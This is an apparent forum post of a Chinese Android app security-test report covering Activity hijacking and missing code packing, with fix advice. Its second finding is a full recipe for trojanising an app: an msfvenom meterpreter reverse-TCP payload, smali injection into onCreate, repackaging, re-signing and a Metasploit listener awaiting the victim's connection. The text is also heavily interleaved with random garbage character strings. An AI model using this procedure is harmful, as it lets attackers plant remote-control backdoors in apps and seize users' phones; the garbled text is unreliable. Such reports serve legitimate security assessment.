8 K' ~& ~& D: Z0 i 5 \6 V2 X1 j ]( v* q# S 1-2 测试结果 : Y% j" u9 x$ J9 O" p( Z2 M+ |! @5 z: {) _% p$ S

3 l* p) u% c& k1 p8 C , d8 h# x3 z6 e t* j2 B

+ O! d. V8 d- z9 G0 C 4 E `4 g8 R2 |3 V   + }( D6 r: @) p' b7 M; H9 w( N x& W% [! Q8 ~+ z( Z- r3 ~/ z4 O

( [$ n( H' @: C5 ?2 X! z1 V! o6 T' J# E# A+ U% h

9 t% [5 u% E. u, ]0 j8 g / S+ {0 ~( L) ~% Q, X" M 2 检测结果                    " L! G' R) J$ o) p. L7 _6 H, H* ?9 j# B* {

0 `/ G+ C! Y$ a7 O ' a' N0 `) G, R: K, X4 s' c2 J

+ o' {8 X" \. h9 W( L# @0 R3 Q! m 3 o) B- m' m- r/ a5 J 2.1 某某某 - r' b5 F6 n( l# w / O/ Z o: t+ v, u4 M* M; U+ ^

r1 G4 R: p' S2 E3 P: V; J7 y5 Z. Y 7 l4 G+ v) P2 k! @9 f, r

9 ~+ g7 g2 x. J# ^( g- a: [+ j 8 K( @6 A. b: N0 [* }8 B 2.1.1检测目标 + s3 f) B) ]* R/ y/ W0 G6 T4 j # B( P: O1 H& ?' g1 c3 ~. x3 q2 X

3 M& n- ~- R; i- p0 U3 y& z0 Z0 C/ T' E. ?! i, j1 _1 G

. V" M+ P; T& U6 J7 Y + |6 h2 w$ H: P 目标地址: 某某某某某某APP 0 f3 `* ~( r; P& L. [4 R* @# [% ? t6 p

/ E) \9 }4 S, C; _- I5 Z! G5 J 8 Z' [' p: p Y7 g! h9 q$ ]$ r; [

2 [7 D; [% {2 H/ b( ?) i1 h8 f- Y. l0 @* n ?* P# V5 o' T 2.1.2检测结果 - d& B# M$ Z: n 5 z Q1 |/ L3 f8 s

& B8 k" ^ C2 f4 Y. T% S2 f , N9 w7 G4 P! l3 x/ [7 T% L

2 C( e" z9 ^) m! I( L; n9 k# \ $ {( @7 L9 ~ { 2.1.2.1 & Y$ X% h( C0 `7 J9 l% v( K# g / g1 x+ P1 w5 l! h* C( N' F+ l& L- H

9 k, m( ?3 s3 g5 a0 e' i+ k( G1 l! Z 4 s) Q5 @3 X" h4 w

" k$ Y( ~! S4 m | M' `, t" |) j1 J& I; f) Y" r& j5 S) t# `$ g 漏洞链接地址:某某某某某某APP X2 ]3 P$ T6 x5 M# S0 v0 D, ~/ o5 ? 3 m9 z5 f! @6 Y8 x

7 R c" g% |' {- W" u4 e* P y) x3 f1 F

2 N& v3 r. G* z, ]% j9 J9 n o B2 M. Q1 h. L& s6 L. _( p   # d6 R( e6 e/ P+ Z - Y- C" ]) Y% ?

" y/ {* P7 V% j* V% I6 c' o4 j ) U! z: Q7 x' E: y- ~: C7 N

m/ Y, v( t! u- w8 H) G & u* X) A! D4 ` 漏洞分析及取证: ' a; W) F; h( C! j$ @4 H. V1 K 8 F: M) X( F% `: y4 V* e! G

A c' O+ Y0 K" ? ; H* A$ n p# d0 Z

1 `( E$ w! }* T+ X0 c5 h# Z5 }4 V$ ~ F) R. n- i& n                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: $ O1 h( k+ _. a0 \# E I - o( q/ L" |- ~

+ v0 a- S/ f! m8 y2 `) t 9 ~+ R4 _' |% _* ~3 y! [$ E

' S3 ^9 d9 m6 a, A# N- \9 s( d) x( P6 t8 d      + ~5 h8 L8 c: K$ c( {3 ^ - ]' s1 y' l+ a, f+ s0 u

- o8 d9 @1 R1 x; b* O( y b 9 U* z+ ]0 s& V2 d8 q

* A7 u' c6 L. O7 A. P % |2 W$ ~$ p8 y! Y' G- X3 J( D6 z: M                       ; f3 }' t) t7 l: J- W: d8 z2 f $ |/ s) g" x4 j9 R, h8 P

9 Z* g3 o/ r* N; p [ 7 a! W4 V( v' w5 G& J

* y i' N- [0 Y2 ? . X2 F& S, y' l0 R! A $ k" y. E2 P) k7 c( ~) c y 4 D7 T- B, r1 _: b% D& E9 F: A6 v

7 u* E; g5 C8 |6 I) Y) w. c9 z, v( \ . \% ?& v4 o$ r7 W# y9 g6 `

9 @' z0 N; s2 ]8 W1 D" i3 M6 l # N) G) G8 ]: C" p8 k3 W- V4 M 7 f9 \: t! i% Z) V1 g0 K4 ~% P- T* \3 S) v

0 O* Z) d8 w0 I- K" O4 X& t 2 H$ n; l$ X9 H% C

1 l) k3 e- y* ]( H* N 8 l0 h; y9 D( T0 B' @/ u. v' k $ H: n9 f- ^, c) N9 i) P {8 G % U& \3 U5 s2 Y F

R5 q( w% ~+ P n$ {& s; F & X8 u# B5 h$ ]* T8 i# H( q

& n% K$ q! `# _/ `# n; ^' F: v: G7 v 5 Z" m1 y6 L T 漏洞危害:高 ; z* ~% ^& `/ q/ F 9 y5 @9 l0 p) s! }- S7 m

- e ~& g9 K a7 G8 Q+ S( v9 l: g; @$ a% h3 w5 `
& N6 X# D; F1 ~! ?* P% m# K 8 u( ]) `$ f- P" A% x1 s% H . d. D( Q) T. H) }4 z K4 ~; Z9 j! P6 J2 z2 L$ l1 ~# E7 P; f2 w/ e/ R+ z8 F4 t# L U8 f3 j) [, @ L& [1 e$ g# U$ D# r; G+ Z; G) s: c* c8 W" k6 e3 ?/ U4 _8 v8 J; |. F8 V z4 {5 L( J) ~# @0 b) x6 f+ X- e B/ ^) r2 e$ A# G* t; {- r' g+ Q* e. z+ H+ e* \. Z) j9 J( u9 b d& A: J2 e. A z) g) S/ s" L8 k: A* P8 j: D8 w3 J/ e$ D3 o1 p* i+ U; h4 U$ Z- V9 T$ K; Z/ O7 X2 k6 E$ ?0 l" f( V( J* w x/ c' m( A8 Q" O( p+ i' {' Y8 C! [9 V& V$ F, N+ ~4 p1 d8 O! y. U4 g2 B t9 _0 I/ N$ U9 g$ C/ k4 r6 H/ U+ L5 S; t) f0 T; }& y; o, M, u" X& _, l5 s" s5 M- e( E2 T$ n, Y. p' V. \* v7 s6 |9 O" u
7 G, _$ w+ N) ]2 P* S+ { " ^ z* S$ T9 u }/ n$ C0 a3 H

3 B1 A8 t% h$ z) f6 n9 K " \. A5 M! b7 e: p* z7 M! D 严重程度 ! g9 X0 k0 g6 L1 U: N4 x- J. S0 \" j$ h$ M9 h

9 O8 f. Z# K; E# Y9 _3 _& F) c& B Z3 N* M
. n* U8 X& b0 S+ h, a : h8 f+ B# u. | t. I

7 n7 w9 j3 D, O6 x6 @" f # x9 b; }# d% r+ j1 [$ m6 ] v % X; S' U0 _1 @ t% D4 ^; z* u$ f g

5 o2 n- i0 O2 [* T3 ~% ^ ) K+ t1 p5 h& V D$ Z' H8 q
' ~5 _3 u# a9 K* J' i 2 r( H' \! w( n% ]' c( I

8 M, x- q$ P9 S, I1 r/ u$ i * v- x) _$ Z. Q( X* G: W 4 h" t4 V9 v0 E* W5 z& \ * G7 }3 K j7 x2 f

6 M6 M$ j. Z' N* A1 J/ H 0 o/ |; n2 I! F, N. N$ K" t* s
. C0 V7 e1 [- a" j* b 3 V( F$ ?) }6 k& A

$ e5 S9 L5 ^$ d! r+ t1 w8 Q9 d8 ~4 V* f " z' ]1 Y+ s# J: {; }; I# w- d9 k4 U0 B1 D

9 G8 d0 @6 A! w- @+ C S " \0 m! A4 J1 i& D7 V- v' Z) j
+ _' D5 o1 h5 y2 a6 L! [ 3 Y/ l; J3 b; X% b

+ d6 C4 [: W* i, f) d% b ( \# F8 L9 W7 J" }   + B. f4 S- P. S8 N$ j ' R2 w8 u( f/ {5 r: O

) Y. h; J* f, ^4 [4 X/ W+ e! Z5 b ) L9 n* P, M0 l
3 `# E8 ^- a: I: X7 F$ m & O& z% x8 E% w0 `# O

# e6 q' K6 U$ V0 ~ q, r7 B% q 5 n, a3 l4 v' o! |$ _ 1 i/ @, D; V" j. x . ]& [* f4 Z4 H8 t5 ^

* k' V# f' q& d* r' z7 ` $ |3 N1 ^ m' z* c: \
7 d E' V$ O" F1 W) O8 o1 w " y2 \6 a" I& d1 P# M

6 }( z9 D3 I) m" {1 @7 g # r/ |- W$ R& G" W9 O   3 S- K+ D, K2 E* G' t5 [! j 6 {# m7 h* H8 M3 q' O; M9 Q* ]

# f2 F, l, |% e$ r& D# y5 u ^+ L% N' E . a+ J6 M5 D4 ?* u
2 @1 [& l! \, }) i y5 i' ` a 1 O1 Q9 p0 O3 N- T. a
3 x6 W! ~5 O2 v% Y2 T7 g: F/ j% E% }# C

& Z) C( J1 x+ K6 i7 e0 a . E8 z& `: L' ]% }7 T   / y5 T! W! L& A0 ? ( ^! T% U; {9 S/ D1 j- i9 z

1 v* }$ J" m; R* x' [5 I. F3 q7 O6 S+ k$ M l2 N$ O

* z- M0 S+ C/ Y0 n. g4 D ' t H" P- V* I+ n; [7 u, o 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' E' K+ T! h# y/ D. V ! f7 F8 m9 D0 Z8 J4 z

5 n, O2 a( H! k- O3 A- M3 {6 l# Q7 T& a' G, \% g

& F5 D! p2 i3 W& h! U$ z) B# @; e5 V L" p8 Y: x           # R# G) a3 w; p4 v8 G+ D' { / y: s$ A* m/ s; d: o$ j

# t7 s1 j2 g9 [" i6 D ) ?0 V- e$ g. H! j( W& d

6 g+ V' z0 B) S* @4 i" n/ ^6 _2 Y( L6 T, |   ( [% Y, N9 A z* ?8 c1 o. P# v & O, a, j- F' \

0 Z* D A: U% o$ r6 j * {* m% d9 ?$ Z, S8 v+ U

( D: W: W+ w; K6 N 3 C+ r& M4 | _1 q9 f7 h 2.1.2.2 4 f( S# d) _# h6 r# k0 I- o ! S3 B0 U& v9 T' }% m5 y

# E& |& T9 Y2 J' W$ a. _9 P/ z9 K- s# C6 c! T8 k

; i, j- e1 L( Y. d% Z( [' `& V& A . J" q( s6 n# M0 b& k 漏洞链接地址:某某某某某某APP i/ U( {8 v7 h' X, D% P 8 `3 s, d/ P$ T/ [

$ L' U6 Y' e# ~! Z; @3 V. y8 z$ m7 e- z

9 c0 a" F ?# q+ ?, \9 F; l8 g2 \9 k+ q3 T- M! V. g6 i" ? 漏洞分析及取证: 6 L' g+ r/ ~% Y1 e9 N2 j2 V " Q/ a4 Y7 t E

: j) U, X5 ?$ n , T6 k7 ?! J6 _7 ^

, O3 P! E! C/ ]/ d0 ?6 @% b 3 U1 ?" o C5 d5 p                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 2 I: ?( Q9 B. S+ U7 E/ N$ O; _" m + u& C+ i, Y! n9 I+ S

X: w; L# Y4 K- H8 c% S9 J+ G! t4 O+ p

8 m! l5 E4 n% O! n7 K) z7 ]( n$ v+ R- b Metasploit 生成木马 apk 5 |# v5 c5 t6 w4 W2 h2 ]# }$ h) X s; j) t' n

C& s& Q$ j; T* ~ \4 G6 V3 y, O' @ c% r$ R) B

; R' R9 K6 K& \- X4 \ t . c9 J: ] R% F# X6 N$ b+ j msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , R% b+ K' i# D: g9 d 4 |9 T- O. w ^: c$ A+ a. B# g

6 Z/ h& B; Z' q' r1 n! Q( J6 l6 I& s& N

# }: v, f; M0 q' n+ Q z! z. t 6 P' e1 B1 K% L+ a8 v' E 反编译目标apk和木马apk ! p" i" U3 W% I; i2 c& [ + X, c a0 c" T! [! Y( Z

0 L: |( v; D( Y' U3 p! O7 R$ t4 _% [1 k# Z' z

6 U, w I- J) s/ L) c2 |9 k - z" y+ t! O# V/ y' m! w O apktool d target.apk
5 s* s( y, P" _3 g0 C ! \3 e5 x' L! u% U, ~ @& m apktool d cockhorse.apk
/ C" i4 y- }. \* G 5 P( g7 m7 t: A% E- Z

, R; e7 D, V' {6 w 4 Q7 Y; w) e- x9 r! O( s, d

2 ?" e! A9 i. @) ?2 P) G2 ? ( u) w! B! [ T( N M5 ?& k 木马 apk 注入目标 apk 3 ?& D9 ^5 s2 N 5 K; o( S) L# V2 @7 x0 l

8 o& c* a2 |8 p0 Z# A 5 i) Y0 n9 I1 [" U w

: j+ c6 E1 @3 N1 L$ y( T2 a ' U( C4 |% `$ E" t: ^. a" q 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
4 g- ]- v0 ]9 F5 a, p ; ]/ Q# p5 t, K+ ^ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
+ Z# E. E, L/ Z5 u( ?- ]$ Q , l! u2 T+ X* s2 P5 p4 D" R

$ v$ t1 ?* i i2 W / x1 d+ T. R \: {! r

' Q$ d% ?2 ^1 T3 Q : ]: M' _8 p* X& ?5 c 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' C6 k9 A$ }2 ^# K" v I " B* n2 N% u; Y2 ^) X& X

0 z( S2 g/ W, f3 ]: }4 T4 @7 L ' n }9 i- G, P8 h9 J' l* h' z

+ K! x$ n0 }$ [& u" g: k0 A' } * S, w; t( V( F1 S0 b' i 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ : t7 J: _# h4 I! L8 X 8 _9 E7 C3 o% ~: R$ n( X& k6 F' }

. [! O9 n* \; A5 ]( b7 f- L * l1 n, O& q! K6 C

5 `- S3 @1 N/ u$ V- I# e, u& a3 U, ?) ]# m8 r( C- ]$ t 回编译生成最终 apk 2 B; i: R/ V+ O0 x8 K 2 ~9 n5 g4 w2 Z4 b* b: P

2 G( O3 a; @4 ^9 T3 W% W7 g E' @9 g+ E' V) v) ~- r( V3 B

* G, ]; G: w* w " K9 J; v& ]9 F6 t" A5 B3 T; T- a 重新打包 * O" A# V" G+ s" Q. w # e' T3 A% a$ u5 [+ c9 H

" Z# b2 [8 N6 ^, b, L/ j# K! i6 u9 Z

) z- ]- c# ?$ u" {! A G8 j$ N # F: {% ~, T/ D9 c apktool b -o repackage.apk target_app_floder 0 Q9 K- O `" X. Q( V! J0 l: B7 L) n* N4 _- ?& r

! w5 U9 X3 `! W2 c$ `2 R / v7 A( }5 Y: B

' m# h, y5 O+ M9 ?/ m6 k 5 L; A7 `# h3 w0 K& y. t 创建签名文件,有的话可忽略此步骤 # Y* ^ T* _- z! H1 k$ h ~9 R q' Q, t

% t' Y. s \5 z( S 8 O! v. M3 [- W0 \

/ v: J, G+ i% V& F; u 2 J9 G/ Q4 G! m/ c- B. `' _* t keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                $ ^/ k |" q1 P/ q; ~% b8 Z0 J$ _ 5 N9 z+ G& ]6 q; |' C7 z

. d% z& D8 @4 r : A2 D* @) f/ J# T; j/ p9 {- m& @

& Z( s/ x3 k4 n2 ?( c1 B! z& z: J3 O/ b7 m 签名,以下任选其一 7 l6 F% c: O: B7 I, n b# k% W+ A% d% {/ Y5 E) u

6 e0 H2 }: z$ X 4 I/ N/ P5 L# b |& t4 h6 m" ~' v

, Q* L c9 [4 Q$ u+ I & l, v: D' S$ F$ n7 _' | A7 k jarsigner 方式 % }" A" J* Z9 `3 K6 V. V5 p ! S# S' R2 K, e# y( C# O! p. j# ]

3 m3 X2 Y/ C2 Y* f1 n* k/ s! M: y 8 I4 m* d; e ^9 q! E! r: X, z

% \8 A9 r5 T. r2 ?9 n' o4 J4 I7 g jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 1 i- m1 y9 s, ]0 m! d0 y2 A# G) u( u 3 L; |+ f! ?4 p/ d3 U7 |

Z) M7 ]4 i) V# D$ l ! I/ ]" O# A2 q- r) @. C1 U

! [7 H+ I4 n: c& i) }4 [# r 6 W$ I- B" T. }+ e- ~; } apksigner 方式 8 a5 i1 J6 D. l * T0 o# r# D0 q3 ^) O2 s Q) l6 V) o8 f

& L) J5 u7 [- e* M! R8 O7 @7 C- Z" C

0 x( W8 Z* y7 V4 H; u4 }7 [ ( L# a1 j3 o9 u/ D0 ^% e5 Q3 L+ g apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 9 y& A+ j! m$ S+ u: G 5 k- w' ~$ m1 B: c2 D

, m9 ?" k5 U- M5 U 4 {7 ~4 e4 x" T" L; Y, r; q* W

' w) u4 l9 ~# Y0 [4 y5 o+ t# _. o4 Q5 A5 g5 R4 a 如需要禁用 v2签名 添加选项--v2-signing-enabled false 5 ?- }" G( S7 A, ]# A 0 `6 d6 j A6 u! Z! E

/ v7 v" C, ]2 d ) p7 W4 b: m9 U8 h2 C& V0 V

) }2 }4 E- B! Q, o; F3 o7 T- o: g. o" r. t! H) A 验证,以下任选其一 P2 d% Z, S1 ]7 u% B, H ' W4 B$ ?/ } a. N

8 W3 o- \+ }+ F4 F0 J& V5 d% L * Z; a# q5 X7 n) _" y8 [3 _

6 j- x+ N* S" c* H % T, o7 ?* h: Z. ` jarsigner方式 - r# z# D$ o U' ^: K7 v! Z 0 `% Q8 \* n, a' h# ^: T W, `

2 X: J2 C1 X% G & k9 b" ~: O% c+ T6 J7 X

% F( M2 p: G7 R1 g; j* {3 k: e$ U% f2 C jarsigner -verify repackaged.apk ' F/ N& y0 Q A9 K$ A! S$ P6 U+ n( y; m4 z( z9 W4 n

0 I% ]) [! p) i, h6 Y5 S+ ^ 1 {- ]0 D9 u0 [& A) C

6 }6 B; H# Z" {% j1 ? 4 \& B' f8 H4 I( Z0 \; R2 ~ apksigner 方式 2 p7 ]7 p t% ?& x8 m, m9 I9 \5 R& i) K

: q0 H! a5 Y Z* [6 U. i7 y * r# v' K* @8 T9 M& ?

. c7 e! O* e6 x/ E/ o f @' B& f' Z7 Z apksigner verify -v --print-certs repackaged.apk $ l A; a, ]% z . V4 B8 N% d8 A: x

' e* w( G' R4 y* d( V8 x! w( H: t N: V, a

# Y# E8 t6 o$ R4 I2 l; \( v+ |, E# T( `% N2 f+ p% M$ l8 n keytool方式 ! z3 B" r8 K* X& h) q. `! L 4 ^" c7 B: e4 s- P( `: W" D. X

4 A" o0 @: r/ x( E* V/ ~+ d & d. u+ \" `( o# i/ i

V2 _. M! b+ b) v* u + ^6 x" q. ?3 o2 V5 B9 \ keytool -printcert -jarfile repackaged.apk " Y" K3 B9 L/ E; m) \0 j * P+ v6 W+ w# r: F) v8 X# s2 S

8 w0 @! M6 X. e( Y6 R( k6 _ " l# w* }3 f) I/ w* E" k2 p. T

4 J! V7 f( ~3 A9 c/ n9 o' \ T- I* J- G8 o! M2 [* ^ 对齐 & i" \3 x! v; `- y1 a& A8 `" ~8 K9 \ $ {7 Y# ~/ M8 z; F# [1 q# L' u

4 {7 _# C$ W* ~2 J" |- ~1 d7 d& @! O# c1 R* G! F9 o& q$ g

) i4 u* _) C3 b3 m, ^6 S6 q6 A; }: j. J! u- S, D, t 字节对齐优化 ; ~: Z3 p# I9 F4 Y+ r; ~6 h1 E* `- O+ F7 \: t# E. M5 t0 n2 @

5 P3 `* F/ @/ N* m 6 M1 n4 R X- r+ g0 F: s

' c- G' p- l8 ? a0 d) a/ h% J # q1 I7 H' V, ?8 J# c* f- V zipalign -v 4 repackaged.apk final.apk ! [4 ^, ]3 D$ K! V- ~1 A0 b! t! g6 X/ m; [" Y# E

1 L$ O( N" E. _: _ % {% ]) ]; Q: B* w0 t

, x, B* T ^4 ]5 ?# v; }- o" I 3 J, ]1 _$ r$ G7 f( e' G0 E4 @' N 检查是否对齐 * D* \! P* |8 V( G5 Q, h; D / ?9 N9 Q+ J: R' ?5 n

0 x3 v* {/ P3 R0 K- } . X0 q$ F% M# ?

2 `0 x# e7 t0 i, F) ~! [) V( B4 ^# q- w$ o) E/ g+ _$ v/ p4 c F zipalign -c -v 4 final.apk & [- A6 i; p* Y' m 5 w8 c1 O" K3 @ X5 U I

; N7 T& ~4 C: U3 }1 ]7 C; D ) [/ w6 K. Q/ ~+ D3 E( v

, P- U# y1 a n; [ & F- T/ Q8 U: Z z: S 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 i( Q1 W8 w7 T' `( R3 i : w; ~; |" f& u {" \6 X: q2 P! W" L

n. i& O1 E3 d8 Z+ N : r5 ~) | Z+ ^; Z

: c! w$ E" ]0 Q1 ~ & {3 P+ ]7 z5 G3 S% l$ T 启动Metasploit控制台,配置参数等待上线 |$ n7 J3 c5 M0 H 2 ~6 P# S b. }

6 l5 k# ^0 L' z. n1 e6 Y & n( C% D( R2 P A p8 B

4 T$ k$ v1 B$ t4 o . T+ m+ ?" Z# G _& m* j) h1 W! ^ 在终端依次输入如下命令 9 F! t, }8 l7 F3 ? + S: J# {( Z8 E

9 ^$ v& s" ?$ r ; u$ {) x! ^* Y: X Z

. X1 J7 g8 @2 B9 `8 T% a$ ~) l# q+ Q9 ^; s msfconsole - T9 P K: Z6 s7 B& H 5 p& d" [3 F& n; T: E( _ F/ A

; h: w R) M, o5 e; U: i . ]; S$ n/ m* S1 G4 a a! a

' n d1 i5 @& z0 ~8 e m# U 3 q. [' {1 N; ] use exploit/multi/handler ' `7 v- r/ K2 p; O' o, o' r: d+ x; I 0 A# w( e1 H$ t, e0 u. C

, F. F& a5 l+ ^0 T. @7 W" ^, D5 W( {8 s5 u% Z

; n' y* X* S! \4 _ $ ?" \. f+ {9 a# v9 d set PAYLOAD android/meterpreter/reverse_tcp ' A l& i7 o8 J, T" O/ r) s9 V* V( c$ C9 o$ N

0 S1 m$ C, b$ A% [. E6 m: E0 G: E6 d

5 }, ?0 H* a3 ]2 @0 B# E* M# F ) z# G' k/ S) W0 S! h set LHOST 192.xxx.xx.xx / j& |4 v5 a3 q; \! o' Z! I/ o( ]" u$ n 0 \1 w8 v- v I8 _' Z( }

4 [) S" ^ V) z/ O: L" b: F% P * V2 u D. |: [+ O

7 F! g# I" I" q9 [$ y( F) ?7 W6 B. H) w; m J+ z% l7 w set LPORT 4444 ! l& p* _4 ^2 P* ?" `/ R& O $ p' L$ p2 l; k' R7 F- d( s

5 {+ J& O; i( s: p/ _- o3 D9 y& S/ [$ j9 d% A, S- B

* u8 e q) y+ G/ v$ J, G $ T4 X+ w" f9 G; n exploit ( n5 l" I/ y0 C" S4 @9 A1 e X: E# w" a/ Y! c$ e- O2 v- w: a

- |9 W( X. ^2 s) C7 ], [5 O: k# p. M/ p3 i: v

3 S4 b8 @! R$ G! h' x; H2 J$ x {# i 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               / l5 G, [- k5 c: \* _& h- V0 w! {( l! I; ^

( \0 f, s2 T) V/ C, e8 x ' K8 g1 Z H \8 w5 ~0 Y; Y9 b' s

* i) W, j _' z; d: h; S 6 z! _2 v4 ?9 w. H2 p/ j 漏洞危害:中 : d1 `" K, ^) f& V' r1 Y ' N$ f, i ^% W+ ]. L0 M

. k6 [. ]9 M& _+ B+ y 1 l: Z5 r' s0 X# X* d
* d N4 g2 j) V/ A8 c# o& }- |' Y1 ^9 K ( E2 f& l o& X3 C 7 H: ~- _3 f5 N 4 w7 y( o: {" D( h7 j, x( Z' ~. {; U/ a3 ^& Q3 v# }$ K# h/ @' k' z4 O+ y3 G# @9 }: g, h$ ~, t; `3 X6 F7 n: L5 h- L0 o: U/ `3 V- a, c/ z8 }) L5 n$ c5 T6 [% s" H3 m* D7 r7 ~/ V. ~; A0 }+ q# _5 n6 Q6 D! E+ L( l' |: ~# ^9 Q% A6 @3 h- a+ e$ O+ j b# c7 q" }7 s8 p% e9 |: T2 Q, T1 D: h6 Y. J/ o& z2 G& |" s1 |( K! `# W3 I/ W4 A) [5 E, _! C b# h, a0 f/ Y6 a8 _) \8 s' N" v- x+ _7 X- R3 [" f- J( \$ G) m2 R2 H: G' V8 t& K7 C% g% ~0 {8 |1 p$ ]4 _( l- T! {( i# a, E- c1 x4 ^+ w9 D0 ^* L! p' \) |" p' I! @$ U3 H. v3 t
0 j/ _2 l" D! A6 x7 p3 |, Z3 W2 D: c J8 ]9 G- @

( G: i1 r! ?: ?3 z3 k8 k8 S " I4 ~ A, O1 e" [) Q L2 V 严重程度 6 p8 G/ ~/ h i+ x! G c ) u: Y+ ?' \; |5 D( J! m

7 G0 V: I' L% ^ : O2 S" O! }/ s
% }2 o v# S8 F! O! R! R! E) F& D& z" V( U9 f5 e4 o

% a) L& m# T1 [& X 6 L# R) V2 h4 ~3 i4 {0 H9 c 3 L3 s- f1 [8 q2 _4 U) _+ j ' y% d ~. m6 T: ]: |

0 ~% v& {3 K1 y* \' I ) _2 b! B/ C0 o& n7 f# _2 p
( K5 I- [& R& Y$ I0 d' A 2 V5 H1 _ @; N/ v* X

1 h7 W' D0 u* i" e: |2 y) g ; M' {9 e9 M! R( I# [" I 2 i2 z6 y% q& C6 ]5 A/ T. A/ N3 y R& Q+ | o2 d

$ c( Z# V4 I0 g8 L4 O+ V$ E ! N1 o4 g7 ?7 P% a
$ O" B2 T. m; ]1 L2 M + }( j0 t6 F9 V* `: @% d; L+ B' [

8 V3 k4 a/ R/ a* q# m. E 3 K f7 }4 U b2 Q+ P& j J' c' N( J1 ^" x: U: ~( N 2 C" L% H8 q5 p4 E: T! C6 _

* Z6 h, {5 x5 k- _4 E 9 z$ a6 _7 C+ y8 G/ W
& w! [' ~- ]6 x4 v9 Q; d * n q' H0 Z6 b/ ~) W8 g* ^- D: J 3 o5 [2 W2 y6 S" q9 B 3 U) [9 U6 w( S, m& b5 Q

* E$ `$ D) u5 o- }9 R, B T* M8 m C3 M4 ]) {- R; E   # |% c2 v: c) T) W+ O. R2 { & f( U" `. F: `& D. f# j0 \1 M$ j

! T7 A- d4 m" a! o: r" Q, v9 f! [* ?! ~7 g4 E: g# o5 F: t4 N; j& E
7 @! f$ x) v6 w' N% t8 D# l w 0 ]7 `3 c; @5 m3 G( T: `

8 e# I; l7 G9 w ; w" m! i' v' ?, O2 ]8 q' e, V # n5 k* K8 n6 E5 v" U1 M ; z( L' d% Q9 _% m( R

/ M0 a/ B# C% B' a7 {( L; V' N/ p8 P9 H% z: m" @+ Q
1 E- I7 r2 U% e. R- G1 L % |8 R( U4 ?3 ? 6 V' N) }6 w; @ * i2 X( I" _; D' ], Q

4 \: a6 r) `! S3 J & ~! a4 x. H# A6 {5 G$ {   & w' q+ O; R; b0 R* I 8 [7 Q* ]1 N3 L! ]* j8 q) m1 [

3 w& X. {+ |3 T: U9 S8 b+ K1 U& G 8 k2 _4 P J7 S% Y# @ }5 Z7 g# x
" }2 k1 k* \, b+ `, Q9 f1 W; g' C$ c3 u1 s( T
. ?" C( {5 O! V( _# O1 b ) u7 V- @$ Q* P5 \3 |% T

# w+ P) @+ ?8 s' { ) A! t" E( S; b% V9 F3 |   ( S' U* y+ }- O: l7 W/ e 8 b1 y+ N# W' J! B4 n: _" h

1 r5 U, T# m! T/ }1 g& V6 [0 Z' Z0 @$ A; V1 ]/ p

- Z! e0 W& X8 I$ \ ( P" J( h, {0 j5 A 修复方法: 7 S) O V4 T; l' U/ ?2 P( _/ y3 Q/ h 8 d' i# F9 ` ~" G

9 e5 L3 k0 w# P2 Z" a: l . R( w) M2 U) U+ F* n; d4 ]

4 Q4 ~1 k' [! x5 M& {6 l/ m 4 p* `, \+ o# h; a( E# r7 p               1. APP 启动时应做签名校验防止二次打包。
% ?$ U; q2 |4 R% @' H9 Z8 S/ P0 S 4 h/ u0 j1 R& n: T' D 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 2 b2 @* V5 |3 S: p & @7 ~' r* X4 w$ d5 N( p/ Z' T

- V6 m: J n" u* n; H- U. n3 J0 u& Z, H H: `7 Z) r8 n2 I& q; `. d 5 m2 p9 e6 O- k! ]7 R- g

9 e! b! Z% W# [: j & G/ E4 j4 N7 U, Y/ ?   - G, B7 |0 q. o5 a! K$ W ( w% R. F! p. \& F# \$ o

" J6 ~ I" f* a2 c: q ) Z6 x: ^, Q5 \. S0 |7 Y ! A+ j4 l2 r" ?1 ?' T 9 K8 M4 _; [6 T" G s) k

- t0 A u+ S; m2 _7 @7 w # `+ d5 J Y3 W: S+ p' ]0 }, a
/ z, O$ p" g1 |9 a. p5 H) H$ I C4 s1 i' E& e! b) @3 ?: R* t

3 X- a' R/ m+ a+ y) v z; i8 h# _ v; @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表